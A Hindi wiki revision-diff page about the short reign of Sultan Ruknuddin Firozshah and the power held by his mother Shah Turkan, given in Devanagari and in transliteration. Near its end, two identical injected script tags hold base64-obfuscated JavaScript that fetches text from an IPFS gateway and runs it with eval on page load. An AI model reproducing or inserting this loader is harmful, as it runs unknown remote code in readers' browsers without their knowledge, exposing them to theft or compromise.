Difference between revisions of "रुकुनुद्दीन फ़ीरोज़शाह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
==रूकनुद्दीन फ़ीरोज़शाह==
+
'''रूकनुद्दीन फ़ीरोज़शाह'''<br />
 +
 
 
*रूकनुद्दीन में सुल्तान बनने के गुणों का सर्वथा अभाव था।  
 
*रूकनुद्दीन में सुल्तान बनने के गुणों का सर्वथा अभाव था।  
 
*वह बहुत ही विलासी और अकर्मणय था। वह दूरदर्शी न था।  
 
*वह बहुत ही विलासी और अकर्मणय था। वह दूरदर्शी न था।  
Line 6: Line 7:
 
*शाह तुर्कान एक निम्नवंशीय नारी थी, जो दासी से रानी और फिर राजमाता के गौरवशाली पद तक पहुँच गयी थी।  
 
*शाह तुर्कान एक निम्नवंशीय नारी थी, जो दासी से रानी और फिर राजमाता के गौरवशाली पद तक पहुँच गयी थी।  
 
*वह विवेकशुन्य और निर्दयी औरत थी। 1236 में 6 मास 7 दिनों के शासन के बाद रूकनुद्दीन की हत्या कर दी गयी और [[रज़िया सुल्तान|रज़िया]] [[दिल्ली]] की सुल्ताना बना दी गयी।
 
*वह विवेकशुन्य और निर्दयी औरत थी। 1236 में 6 मास 7 दिनों के शासन के बाद रूकनुद्दीन की हत्या कर दी गयी और [[रज़िया सुल्तान|रज़िया]] [[दिल्ली]] की सुल्ताना बना दी गयी।
 +
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=आधार1
 
|आधार=आधार1

Revision as of 09:08, 2 November 2010

rookanuddin firozashah

  • rookanuddin mean sultan banane ke gunoan ka sarvatha abhav tha.
  • vah bahut hi vilasi aur akarmanay tha. vah dooradarshi n tha.
  • vah shasan karane mean ayogy tha.
  • usaki maan shah turkan ne shasan ki bag dor apane hatath mean le li.
  • shah turkan ek nimnavanshiy nari thi, jo dasi se rani aur phir rajamata ke gauravashali pad tak pahuanch gayi thi.
  • vah vivekashuny aur nirdayi aurat thi. 1236 mean 6 mas 7 dinoan ke shasan ke bad rookanuddin ki hatya kar di gayi aur raziya dilli ki sultana bana di gayi.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh